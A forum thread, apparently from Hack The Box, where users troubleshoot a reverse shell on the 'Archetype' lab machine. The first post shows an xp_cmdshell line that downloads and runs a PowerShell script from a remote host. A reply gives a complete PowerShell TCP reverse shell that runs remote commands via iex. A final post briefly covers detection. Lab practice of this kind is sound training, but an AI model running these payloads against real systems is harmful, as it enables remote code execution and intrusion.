ARCETYPE - Reverse shell error

HTB Content Machines
1

It seems the reverse shell throws some errors. I cant quite figure out why. I did a copy from the pdf and changed the IP to match what I was assigned and it dumps this:

SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.152:88/shell.ps1\“);”
output

IEX : At line:3 char:78

  • … Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName

  •                                                                      ~

Missing closing ‘)’ in expression.

At line:4 char:1

  • System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $ …

  •

Unexpected token ‘System.Text.ASCIIEncoding’ in expression or statement.

At line:3 char:47

  • $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object - …

  •                                           ~

Missing closing ‘}’ in statement block or type definition.

At line:4 char:26

  • System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $ …

  •                      ~

Unexpected token ‘)’ in expression or statement.

At line:6 char:81

  • … ding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyt

  •                                                                      ~

Missing ‘)’ in method call.

At line:7 char:1

  • e.Length);$stream.Flush()};$client.Close()

  •

Unexpected token ‘e.Length’ in expression or statement.

At line:7 char:9

  • e.Length);$stream.Flush()};$client.Close()

  •     ~

Unexpected token ‘)’ in expression or statement.

At line:7 char:26

  • e.Length);$stream.Flush()};$client.Close()

  •                      ~

Unexpected token ‘}’ in expression or statement.

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.152:88

  • 
  + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException   

  + FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.PowerShell.Commands.InvokeExpressionCommand

NULL

SQL>

Did I mess up something at a point ?

2

Hi, I’m having the exact same issue - did you resolve it?

3

Found the issue, for anyone having the same problem, if you copy/paste the powershell command directly, it has errors, you need to reformat before saving:

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.48”,443);
$stream = $client.GetStream();
[byte]$bytes = 0…65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

4

To detect this type of reverse shell, you can check whether the standard input and standard output are redirected to a socket, or whether the host or network logs match the characteristics of this type of reverse shell. Security Center can detect this type of reverse shell.
Regards,
Rachel Gomez